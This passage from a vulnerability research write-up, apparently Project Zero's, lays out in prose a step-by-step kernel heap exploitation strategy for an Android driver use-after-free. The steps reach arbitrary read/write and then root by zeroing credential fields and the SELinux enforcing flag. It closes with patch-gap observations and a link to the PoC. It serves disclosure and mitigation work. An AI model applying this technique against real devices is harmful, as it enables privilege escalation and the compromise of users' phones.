The fdtable represents an attractive object to find, as it comes out of the same generic kmalloc cache as dma_buf name strings. We can find a dma_buf name string’s virtual address by using dma_buf_set_name (which we also use as our arbitrary free primitive) to insert a pointer to a dma_buf name string into the reclaimed UAF’d dma_buf object that is now a GE buffer. We then simply read it out of our GE buffer, free that dma_buf name string (again using dma_buf_set_name), and reclaim it with an fdtable. Creating fdtables is fairly easy - we simply fork many processes ahead of time that share an fdtable, then unshare(2) the fdtable at the appropriate time to allocate new fdtables. The full exploit strategy is as follows:

  1. Trigger a dangling fd of a dmabuf file using our mtk-jpeg race condition bug
  2. Reclaim the underlying dma_buf leaving the parent dmabuf file free (but still referenced by a dangling file descriptor)
  3. Use ged_dmabuf_set_name on our dangling file to place a new name pointer in the fake dma_buf struct
  4. Read the fake dma_buf struct (which is really a GE buffer) to get the name pointer
  5. Free the name pointer by calling ged_dmabuf_set_name again
  6. Reclaim the name pointer as an fdtable with references to a GE fd with an array of GE buffers
  7. Use the arbitrary read to find the GE buffer array
  8. Use the arbitrary free to free the GE buffer array
  9. Reclaim the GE buffer array with another GE buffer

At the end of this process we’ll have a reliable arbitrary read/write!

Getting a root shell

As a fun exercise, I decided to see how easy it was to disable SELinux and get root after achieving arbitrary read/write. Various manufacturers may implement certain tripping hazards to slow down exploit development efforts, but in my case (Asus ROG 6D), there were no hoops I needed to jump through at all. It was enough to simply write 0 to the uid/gid of my process’s cred struct to achieve root, and write 0 to the selinux_enforcing bit to turn off SELinux. After this I just execlp(“/system/bin/sh”,...) and out pops a root shell!

Getting root on an Android device with the exploit

Conclusion

I discovered significant security vulnerabilities across all 3 of the evaluated devices. It is highly likely that reviewing more devices comprising a greater spread of chipset manufacturers would lead to the discovery of additional vulnerabilities. Android regularly uses higher-privileged processes to liaise between applications and kernel drivers, meaning that most kernel drivers cannot be seen from an unprivileged app context (the GPU being the most obvious exception to this rule). Nevertheless, a determined attacker could use vulnerabilities in other more privileged processes to pivot into contexts from which the attack surface of these kernel drivers become reachable. This pivot strategy could widen the attack surface beyond the scope of this research.

As it becomes more difficult to find 0-days in core Android, third-party Linux kernel drivers continue to become a more and more attractive target for attackers. While the bulk of present-day detected ITW Android exploitation targets GPU drivers, it’s equally important that other third-party drivers are encouraged towards the same security standards.

There is room for improvement in the patching process across all 3 of the bugs discovered. None of the patches for these bugs met Project Zero's 90-day deadline for patches reaching end-users. This appears to largely be a result of the propagation delay from when third-party driver developers issue patches to when downstream manufacturers can incorporate those patches into Android security updates. Shortening this propagation delay (e.g. using Android APEX to ship updated kernel drivers) would go a long way to minimizing the Android driver patch gap. In addition, one of these bugs was only partially patched and remained exploitable on some devices for an additional 2 years before the security impact of the bug was assessed and publicly reported. Developers should regularly consider the security impacts of bugs, especially those reported by static analysis tools designed to detect security-relevant issues.

Finally, while cross-cache heap shaping mitigations significantly impede exploit development strategies, they don’t entirely prevent a determined attacker from exploiting kernel UAF vulnerabilities, even if the UAF’d object comes out of a dedicated slab cache. In this particular case, second-order allocations in a UAF’d object lead to powerful and exploitable primitives. Developers may be able to mitigate this technique by setting pointers to NULL, even if the parent object is about to get freed anyway. However, this exploit technique demonstrates that even well-designed mitigations (such as SLAB_VIRTUAL) come with limitations in an era where an attacker can achieve undetected memory corruption. It will take more fundamental mitigations that address the root issue of memory corruption, like MTE, in order to dramatically raise the bar for attackers.

Resources

This research was presented at ShmooCon, a video is available here https://archive.org/details/shmoocon2024/Shmoocon2024-SethJenkins-Driving_Forward_in_Android_Drivers.mp4

The proof of concept exploit code developed and presented in this research is available at:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2470#c4

❌
❌